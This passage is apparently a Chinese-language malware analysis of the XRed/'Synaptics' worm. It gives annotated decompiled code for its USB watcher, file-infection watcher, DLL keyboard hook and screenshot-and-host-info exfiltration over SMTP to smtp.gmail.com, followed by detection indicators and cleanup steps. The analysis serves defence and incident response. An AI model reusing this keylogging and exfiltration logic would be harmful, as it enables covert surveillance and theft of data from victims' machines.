// Purpose: enable (a2 != 0) or disable (a2 == 0) the shell-change notifier stored in the
// form object at a1+0x314. When enabling, it watches "<appdir>\WS" and installs
// Drive_Added_497080 / Drive_Removed_4971A8 as the only two event handlers; those are
// where removable-media handling lives (cf. remediation step 0 about USB drives).
// Returns LStrArrayClr's result.
// Detection value: creation of "<Synaptics appdir>\WS" and the log strings
// "USB Hooks -> Active" / "USB Hooks -> Deactive" are host-side indicators.
System__AnsiString = 0;
v11 = 0;
v10 = &savedregs;
v9[1] = (unsigned int)&loc_49702A;
// Outer try/finally frame.
v9[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v9);
// Non-short-circuit AND: create the notifier only when enabling and none exists yet.
if ( (a2 & (*(_DWORD *)(a1 + 0x314) == 0)) != 0 )
*(_DWORD *)(a1 + 0x314) = TOrtusShellChangeNotifier_Create(VMT_45E2AC_TOrtusShellChangeNotifier);
if ( a2 )
{
// Inner try/finally around the (re)configuration.
v8[2] = (unsigned int)&savedregs;
v8[1] = (unsigned int)&loc_496FE6;
v8[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v8);
// Ensure "<appdir>\WS" exists (the path is built twice; the second copy only feeds CreateDir).
LStrCat3(&System__AnsiString, Synaptics_appdir_49F144, "\\WS");
if ( !(unsigned __int8)DirectoryExists(System__AnsiString) )
{
LStrCat3(&v11, Synaptics_appdir_49F144, "\\WS");
CreateDir(v11);
}
// Reset the notifier's watch collection (+0xEE) and add one entry whose path (+0xC) is
// "<appdir>\WS" and whose flag byte (+0x10) is set — presumably "watch subtree" — TODO confirm.
TCollection_Clear(*(Classes::TCollection **)(*(_DWORD *)(a1 + 0x314) + 0xEE));
v4 = sub_45F1B4(*(Classes::TCollection **)(*(_DWORD *)(a1 + 0x314) + 0xEE));
LStrCat3((void *)(v4 + 0xC), Synaptics_appdir_49F144, "\\WS");
*(_BYTE *)(v4 + 0x10) = 1;
// Zero the notifier's event slots (+0x32 .. +0xCE), then install two handlers. The
// (code, a1) pairs at +0x52/+0x56 and +0x62/+0x66 match the layout of a Delphi method
// pointer (code, Self); every other event slot is left unset.
v5 = *(_DWORD *)(a1 + 0x314);
*(_DWORD *)(v5 + 0x32) = 0;
*(_DWORD *)(v5 + 0x36) = 0;
*(_DWORD *)(v5 + 0x3A) = 0;
*(_DWORD *)(v5 + 0x3E) = 0;
*(_DWORD *)(v5 + 0x42) = 0;
*(_DWORD *)(v5 + 0x46) = 0;
*(_DWORD *)(v5 + 0x4A) = 0;
*(_DWORD *)(v5 + 0x4E) = 0;
// Drive-added handler
*(_DWORD *)(v5 + 0x56) = a1;
*(_DWORD *)(v5 + 0x52) = Drive_Added_497080;
*(_DWORD *)(v5 + 0x5A) = 0;
*(_DWORD *)(v5 + 0x5E) = 0;
// Drive-removed handler
*(_DWORD *)(v5 + 0x66) = a1;
*(_DWORD *)(v5 + 0x62) = Drive_Removed_4971A8;
*(_DWORD *)(v5 + 0x6A) = 0;
*(_DWORD *)(v5 + 0x6E) = 0;
*(_DWORD *)(v5 + 0x72) = 0;
*(_DWORD *)(v5 + 0x76) = 0;
*(_DWORD *)(v5 + 0x7A) = 0;
*(_DWORD *)(v5 + 0x7E) = 0;
*(_DWORD *)(v5 + 0x82) = 0;
*(_DWORD *)(v5 + 0x86) = 0;
*(_DWORD *)(v5 + 0x8A) = 0;
*(_DWORD *)(v5 + 0x8E) = 0;
*(_DWORD *)(v5 + 0x92) = 0;
*(_DWORD *)(v5 + 0x96) = 0;
*(_DWORD *)(v5 + 0x9A) = 0;
*(_DWORD *)(v5 + 0x9E) = 0;
*(_DWORD *)(v5 + 0xA2) = 0;
*(_DWORD *)(v5 + 0xA6) = 0;
*(_DWORD *)(v5 + 0xAA) = 0;
*(_DWORD *)(v5 + 0xAE) = 0;
*(_DWORD *)(v5 + 0xB2) = 0;
*(_DWORD *)(v5 + 0xB6) = 0;
*(_DWORD *)(v5 + 0xBA) = 0;
*(_DWORD *)(v5 + 0xBE) = 0;
*(_DWORD *)(v5 + 0xC2) = 0;
*(_DWORD *)(v5 + 0xC6) = 0;
*(_DWORD *)(v5 + 0xCA) = 0;
*(_DWORD *)(v5 + 0xCE) = 0;
// Start watching and log it.
TOrtusShellChangeNotifier_SetActive(v5, 1);
str_add_4967D4(a1, (int)"USB Hooks -> Active");
__writefsdword(0, v8[0]);
}
else
{
// Disable path: only deactivates if a notifier was ever created; the object is not freed here.
v6 = *(_DWORD *)(a1 + 0x314);
if ( v6 )
{
TOrtusShellChangeNotifier_SetActive(v6, 0);
str_add_4967D4(a1, (int)"USB Hooks -> Deactive");
}
}
__writefsdword(0, v9[0]);
v10 = (int *)&loc_497031;
return LStrArrayClr(&v11, 2);
}
5.5 Directory_Watcher
監控「我的文件」、「桌面」、「下載」三個目錄，針對 .exe 與 .xlsx 副檔名的檔案進行監控
// ControlCenter fragment (the enclosing function starts and ends outside this excerpt):
// when the Directory_Watcher flag is set, register the user's Documents, Desktop and
// Downloads folders with Drive_Watcher and enable the directory watcher; otherwise disable it.
// Indices 5/6/7 are selectors of the malware's own Get_SpecialFolder_4730FC wrapper, not
// necessarily raw shlobj CSIDL values — the comments below reflect the analyst's mapping.
if ( (_BYTE)flag_Directory_Watcher )
{
// CSIDL_PERSONAL (Documents)
Get_SpecialFolder_4730FC(5, (int)&System__AnsiString);
// CSIDL_DESKTOP
Get_SpecialFolder_4730FC(6, (int)&v36);
// Downloads
Get_SpecialFolder_4730FC(7, (int)&v35);
// Each folder is registered only if it actually exists on this host.
if ( (unsigned __int8)DirectoryExists(System__AnsiString) )
Drive_Watcher_496A40((int)v38, (void *)System__AnsiString, 0, 0);
if ( (unsigned __int8)DirectoryExists((const int)v36) )
Drive_Watcher_496A40((int)v38, v36, 0, 0);
if ( (unsigned __int8)DirectoryExists((const int)v35) )
Drive_Watcher_496A40((int)v38, v35, 0, 0);
// .exe .xlsx — per the analysis text, the file types the watcher targets; these are also the
// files the remediation section says need restoring.
Directory_Watcher_496B94((int)v38, 1);
}
else
{
Directory_Watcher_496B94((int)v38, 0);
}
5.6 鍵盤記錄 Keyboard_hook
釋放 KBHKS 資源為 Synaptics.dll，並呼叫其中的 HookOn、HookOff
// ControlCenter fragment (enclosing function outside this excerpt): create the TKBLogger
// once (stored in the form at v38 + 0xBF dwords) and switch the keyboard hook on, or switch
// an existing one off. The logger is created with the Synaptics appdir and
// ptr_Synaptics_dll_49D6B0 (by its name, the embedded DLL resource — TODO confirm).
// See Keyboard_hook_4764E4 below for what enabling actually does.
if ( (_BYTE)is_Keyboar_Hook )
{
v14 = TKBLogger_Create(VMT_476248_TKBLogger, 1, Synaptics_appdir_49F144, ptr_Synaptics_dll_49D6B0);
*((_DWORD *)v38 + 0xBF) = v14;
// The form's HWND is handed to the hook, presumably so the hook DLL can report back to this window.
Handle = TWinControl_GetHandle(v38);
// Enable flag (register-reuse artefact of the decompiler).
LOBYTE(v16) = 1;
Keyboard_hook_4764E4(v14, v16, Handle);
str_add_4967D4((int)v38, (int)"Keyboard Hook -> Active");
}
else
{
// Disable only if a logger was created earlier; the object is not freed here.
v17 = *((_DWORD *)v38 + 0xBF);
if ( v17 )
{
v18 = TWinControl_GetHandle(v38);
Keyboard_hook_4764E4(v17, 0, v18);
str_add_4967D4((int)v38, (int)"Keyboard Hook -> Deactive");
}
}
int __fastcall Keyboard_hook_4764E4(int a1, void *a2, int a3)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// Purpose: turn the keylogger on ((_BYTE)a2 != 0) or off. a1 is the TKBLogger object
// (fields used: +0x30/+0x34 section handles, +0x38/+0x3C mapped views, +0x40 DLL module,
// +0x44 HookOn, +0x48 HookOff); a3 is the window handle published to the hook DLL via two
// 4-byte shared sections. Returns LStrClr's result. Errors surface as Delphi exceptions.
// Detection value: the dropped hook DLL (named by Synaptics_dll_49EC58, fallback name
// prefixed "X") exporting HookOn/HookOff, and the named section objects "ElReceptor" and
// "CBReceptor", are concrete host-side indicators; the exception messages are Turkish.
v21 = 0;
v20 = &savedregs;
v19[1] = (unsigned int)&loc_476697;
// try/finally frame for the whole body.
v19[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v19);
if ( (_BYTE)a2 )
{
// Drop the KBHKS resource to disk as the hook DLL, then load it (dword_49EC5C is
// presumably the full path paired with the Synaptics_dll_49EC58 name — TODO confirm).
release_KBHKS_47671C((void *)a1, a2, Synaptics_dll_49EC58);
v6 = (const CHAR *)LStrToPChar(dword_49EC5C);
*(_DWORD *)(a1 + 0x40) = kernel32_LoadLibraryA(v6);
if ( !*(_DWORD *)(a1 + 0x40) )
{
// Load failed: drop the DLL again under "X" + name and retry the load once.
LStrCat3(&v21, "X", Synaptics_dll_49EC58);
release_KBHKS_47671C((void *)a1, a2, v21);
v7 = (const CHAR *)LStrToPChar(dword_49EC5C);
*(_DWORD *)(a1 + 0x40) = kernel32_LoadLibraryA(v7);
}
// Resolve the two exports; if either is missing, raise a Delphi Exception with the Turkish
// message aDllFonksiyonuB (presumably "DLL function ... not found" — TODO confirm).
*(_DWORD *)(a1 + 0x44) = kernel32_GetProcAddress_0(*(HMODULE *)(a1 + 0x40), "HookOn");
*(_DWORD *)(a1 + 0x48) = kernel32_GetProcAddress_0(*(HMODULE *)(a1 + 0x40), "HookOff");
if ( !*(_DWORD *)(a1 + 0x44) || !*(_DWORD *)(a1 + 0x48) )
{
LOBYTE(v8) = 1;
v9 = Exception_Create(VMT_408034_Exception, v8, aDllFonksiyonuB);
RaiseExcept(v9);
}
// Shared section #1: pagefile-backed (handle -1 = INVALID_HANDLE_VALUE), PAGE_READWRITE (4),
// 4 bytes, named "ElReceptor". Failure raises Exception(aDosyaOlu), presumably a Turkish
// "file could not be created" message — TODO confirm.
FileMappingA = kernel32_CreateFileMappingA((HANDLE)0xFFFFFFFF, 0, 4u, 0, 4u, "ElReceptor");
*(_DWORD *)(a1 + 0x30) = FileMappingA;
if ( !FileMappingA )
{
LOBYTE(v11) = 1;
v12 = Exception_Create(VMT_408034_Exception, v11, aDosyaOlu);
RaiseExcept(v12);
}
// Map it FILE_MAP_WRITE (2) and store the HWND, so code running in other processes (the
// hook DLL) can locate this window; how the DLL uses it is not visible here.
v13 = kernel32_MapViewOfFile(*(HANDLE *)(a1 + 0x30), 2u, 0, 0, 0);
*(_DWORD *)(a1 + 0x38) = v13;
*v13 = a3;
// Shared section #2, "CBReceptor": same layout, same HWND.
v14 = kernel32_CreateFileMappingA((HANDLE)0xFFFFFFFF, 0, 4u, 0, 4u, "CBReceptor");
*(_DWORD *)(a1 + 0x34) = v14;
if ( !v14 )
{
LOBYTE(v15) = 1;
v16 = Exception_Create(VMT_408034_Exception, v15, aDosyaOlu);
RaiseExcept(v16);
}
v17 = kernel32_MapViewOfFile(*(HANDLE *)(a1 + 0x34), 2u, 0, 0, 0);
*(_DWORD *)(a1 + 0x3C) = v17;
*v17 = a3;
// HookOn: install the hook (cdecl export, no arguments).
(*(void (__cdecl **)())(a1 + 0x44))();
}
else
{
// Teardown in reverse order: HookOff, unload the DLL, then release both sections. Note that
// the second section (+0x34/+0x3C) is unmapped/closed only when the first (+0x30) is set.
if ( *(_DWORD *)(a1 + 0x48) )
// HookOff
(*(void (__cdecl **)())(a1 + 0x48))();
if ( *(_DWORD *)(a1 + 0x40) )
kernel32_FreeLibrary_0(*(HMODULE *)(a1 + 0x40));
if ( *(_DWORD *)(a1 + 0x30) )
{
kernel32_UnmapViewOfFile(*(LPCVOID *)(a1 + 0x38));
kernel32_UnmapViewOfFile(*(LPCVOID *)(a1 + 0x3C));
kernel32_CloseHandle_0(*(HANDLE *)(a1 + 0x30));
kernel32_CloseHandle_0(*(HANDLE *)(a1 + 0x34));
}
}
__writefsdword(0, v19[0]);
v20 = (int *)&loc_47669E;
return LStrClr(&v21);
}
5.7 郵件傳送 Auto_Mail_Sender_4974E4
透過 SMTP 傳送主機資訊
// ControlCenter fragment (enclosing function outside this excerpt): the two branches differ
// only in the enable flag (third argument) and v28. Both parse dword_49F1C4 with StrToInt
// (presumably a configured interval — TODO confirm) and pass it to Auto_Mail_Sender_4974E4.
// Delphi StrToInt raises on a malformed string, so a bad config value would abort this path.
if ( (_BYTE)flag_Auto_Mail_Sender )
{
v28 = 1;
v19 = StrToInt(dword_49F1C4);
Auto_Mail_Sender_4974E4((int)v38, v19, 1, v28);
}
else
{
v28 = 0;
v20 = StrToInt(dword_49F1C4);
Auto_Mail_Sender_4974E4((int)v38, v20, 0, v28);
}
int __fastcall sub_497290(int a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// Purpose: exfiltrate host information by e-mail. Lazily creates the TSendMail object at
// a1+0x300, then — only when the network is up — builds a body from the objects at a1+0x2FC
// and a1+0x30C, takes a screenshot into <TempPath>\<8 random chars>.jpg, attaches it and
// sends through smtp.gmail.com:465. a1 is the form object. Returns LStrArrayClr's result.
// Detection value: outbound SMTP to smtp.gmail.com:465 from a non-mail process, the
// "XRed57 > " subject marker, and a freshly written random-named .jpg in the temp folder.
// Note: the decompiler reuses ExceptionList, v6, v7, v9 and v10 as plain string temporaries
// below; they are not all exception-frame fields.
v9 = &loc_49743D;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&ExceptionList);
// Create the mailer once; dword_49F18C/49F190/49F194 are configuration globals whose
// meaning is not visible here (presumably account settings — TODO confirm).
if ( !*(_DWORD *)(a1 + 0x300) )
*(_DWORD *)(a1 + 0x300) = TSendMail_Create(
(int)VMT_494B1C_TSendMail,
1,
(int)Synaptics_appdir_49F144,
dword_49F18C,
dword_49F190,
dword_49F194);
if ( Internet_GetConnectedState_474D34() )
{
// Inner try/finally around message composition and send.
v7 = (const char *)&savedregs;
v6 = &loc_497418;
v5 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&v5);
// Message body: text derived from the object at +0x2FC, plus the result of a virtual call
// (slot +0x1C) on the object at +0x30C — presumably a TStrings text getter — TODO confirm;
// six pieces are then concatenated (LStrCatN lists its pieces in reverse order).
sub_477050(*(_DWORD *)(a1 + 0x2FC), &dest);
(*(void (__fastcall **)(void *, void *, void *))(**(_DWORD **)(a1 + 0x30C) + 0x1C))(
*(void **)(a1 + 0x30C),
&v21,
**(void ***)(a1 + 0x30C));
LStrCatN(&dest, 6, v21, v13, v14, v15, System__AnsiString, v17);
// SMTP endpoint plus two more config globals (dword_49F198/49F19C, presumably the
// sending account's credentials — TODO confirm).
sub_494D10(*(_DWORD *)(a1 + 0x300), (int)"smtp.gmail.com", (int)"465", dword_49F198, dword_49F19C);
v12 = dest;
v11 = dword_49F1A0;
v10 = "XRed57 > ";
// GetComputerName
Get_ComputerName_472E18((int)&v19);
v9 = v19;
ExceptionList = (_EXCEPTION_REGISTRATION_RECORD *)" : ";
// mac
get_Netbios_475658((int)&v18);
// Subject, presumably "XRed57 > <ComputerName> : <NetBIOS/MAC string>" (pieces in reverse order).
LStrCatN(&v20, 4, v18, ExceptionList, v9, v10);
v6 = (void *)v20;
// GetUserNameA
Get_UserNameA_472E58((int)&v17);
// The argument list shown here is unreliable decompiler output; the values prepared above
// (dest, dword_49F1A0, the subject in v20, the user name in v17) are presumably what is passed.
Set_EMailAddresses_494EB8(*(_DWORD *)(a1 + 0x300), v17, (int)v6, (int)ExceptionList, (int)v7);
// Screenshot path: <TempPath> + "\" + <8 random chars> + ".jpg" (pieces in reverse order).
Get_TempPath_4737B0((int)&v14);
ExceptionList = v14;
v7 = "\\";
randomstr_472D44(8, &v13);
LStrCatN(&v15, 4, ".jpg", v13, v7, ExceptionList);
// screenshot: capture the screen to v15; System__AnsiString receives the resulting path
screen_4752EC(v15, (int)&System__AnsiString);
// Presumably adds the file as an attachment — TODO confirm.
sub_494F84(*(_DWORD *)(a1 + 0x300), System__AnsiString, 1);
do_Mail_Send_49546C(*(_DWORD *)(a1 + 0x300), v2, v3);
__writefsdword(0, (unsigned int)v5);
}
__writefsdword(0, (unsigned int)ExceptionList);
v10 = (const char *)&loc_497444;
return LStrArrayClr(&v13, 0xA);
}
TFormVir_FormClose
退出
int __fastcall TFormVir_FormClose(Controls::TWinControl *a1)
{
  // Form close handler: runs ControlCenter with flag 0, i.e. the shutdown/deactivate path.
  const int rc = ControlCenter_49A3E0(a1, 0);
  return rc;
}
處置
0、不要插入隨身碟
1、結束程序Synaptics.exe
2、刪除自啟動項
- 計算機\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- 計算機\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
下的 Synaptics Pointing Device Driver 以及對應檔案
3、刪除目錄
- 刪除登錄檔項以及設定的目錄
HKEY_LOCAL_MACHINE (管理員時) 或者HKEY_CURRENT_USER 下Software\Synaptics\APPDir 值設定的目錄
- C:\ProgramData\Synaptics
4、清理/恢復「我的文件」、「桌面」、「下載」下的 exe 和 xlsx 檔案：若目錄下存在「._cache_」加原檔名的檔案，將其改名即可恢復
不存在時需提取EXERESX資源
Excel 檔案的感染方式為與 RCData 中的 XLSM 資源合併，大概是巨集，